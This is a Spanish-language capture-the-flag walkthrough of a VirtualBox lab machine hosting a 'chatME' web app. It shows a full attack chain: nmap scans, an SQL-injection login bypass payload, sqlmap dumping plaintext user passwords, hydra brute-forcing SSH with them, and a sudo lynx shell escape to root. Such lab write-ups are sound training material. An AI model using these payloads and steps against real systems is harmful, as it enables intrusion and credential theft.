Identificamos la IP de la máquina victima:
❯ arp-scan --interface=wlo1 --localnet | grep PCS
192.168.1.117 08:00:27:70:fd:a1 PCS Systemtechnik GmbHEnumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.117
[sudo] contraseña para wh01s17:
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-24 12:58 -0400
Nmap scan report for 192.168.1.117
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:70:FD:A1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.117
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-24 12:58 -0400
Nmap scan report for 192.168.1.117
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e3:fc:1b:74:e5:e3:c9:ef:6d:ac:df:b1:1e:47:83:ad (RSA)
| 256 10:bd:60:33:a0:d1:a4:7d:de:c8:29:0a:c4:7d:b1:aa (ECDSA)
|_ 256 4b:fc:30:a8:12:69:e7:b2:ce:ad:99:f1:66:12:cd:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: chatME
|_http-server-header: nginx/1.14.2
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 secondsIngresamos a http://192.168.1.117/ y nos encontramos con un login, el cual es vulnerable a SQLi, por lo que nos logueamos con el payload admin' OR 1=1-- -.
Una vez dentro, nos encontramos con un chat, por lo que mandamos un mensaje e interceptamos con burpsuite:
POST /send_message.php HTTP/1.1
Host: 192.168.1.117
Content-Length: 13
X-Requested-With: XMLHttpRequest
Accept-Language: es-419,es;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://192.168.1.117
Referer: http://192.168.1.117/home.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=pabh70lknuir59i396l0c2ujjn
Connection: keep-alive
msg=fdsa&id=1Una vez capturada la request, copiamos el resultado en un archivo con la opción "Copy to file" de burpsuite y analizamos con sqlmap:
❯ sqlmap -r /ruta/absoluta/a/request --threads 10 --dbs
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema
❯ sqlmap -r /ruta/absoluta/a/request --threads 10 --tables -D chat
Database: chat
[3 tables]
+-----------+
| user |
| chat |
| chat_room |
+-----------+
❯ sqlmap -r /ruta/absoluta/a/request --dump -D chat -T user
Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+-----------+
| userid | email | phone | password | username | your_name |
+--------+-----------------+-------------+-----------------+----------+-----------+
| 5 | david@david.com | 11 | adrianthebest | david | david |
| 4 | jerry@jerry.com | 111 | thatsmynonapass | jerry | jerry |
| 2 | nona@nona.com | 1111 | myfriendtom | nona | nona |
| 1 | pao@yahoo.com | 09123123123 | pao | pao | PaoPao |
| 3 | tina@tina.com | 11111 | davidwhatpass | tina | tina |
+--------+-----------------+-------------+-----------------+----------+-----------+También, podemos automatizar la extracción con un script en Python, para explotar Blind SQLi (Time-Based):
❯ python sqli-blind.py
...
[*] Extrayendo registros de `user`...
[+] Registro 1
[+] Extrayendo: pao:pao
-> pao:pao
[+] Registro 2
[+] Extrayendo: nona:myfriendtom
-> nona:myfriendtom
[+] Registro 3
[+] Extrayendo: tina:davidwhatpass
-> tina:davidwhatpass
[+] Registro 4
[+] Extrayendo: jerry:thatsmynonapass
-> jerry:thatsmynonapass
[+] Registro 5
[+] Extrayendo: david:adrianthebest
-> david:adrianthebest
...Formateamos la salida en 2 wordlists, uno con users y otra con passwords, para probar con hydra:
❯ hydra -L users.txt -P passwds.txt 192.168.1.117 ssh -t 64
...
[22][ssh] host: 192.168.1.117 login: jerry password: myfriendtom
[22][ssh] host: 192.168.1.117 login: nona password: thatsmynonapass
[22][ssh] host: 192.168.1.117 login: david password: davidwhatpass
...Establecemos conexión con el usuario nona y obtenemos la primera flag:
❯ ssh nona@192.168.1.117
nona@192.168.1.117\'s password: thatsmynonapass
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 24 15:12:11 2025 from 192.168.1.5
nona@talk:~$Para escalar privilegios, ejecutamos el comando sudo -l:
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nona may run the following commands on talk:
(ALL : ALL) NOPASSWD: /usr/bin/lynxPodemos ejecutar el comando lynx como cualquier usuario y sin contraseña.
Para obtener una shell del usuario root, ejecutamos lo siguiente:
nona@talk:~$ sudo /usr/bin/lynx
! (SHIFT + 1)
Spawning your default shell. Use 'exit' to return to Lynx.
root@talk:/home/nona#Obtenemos nuestra siguiente flag y fin.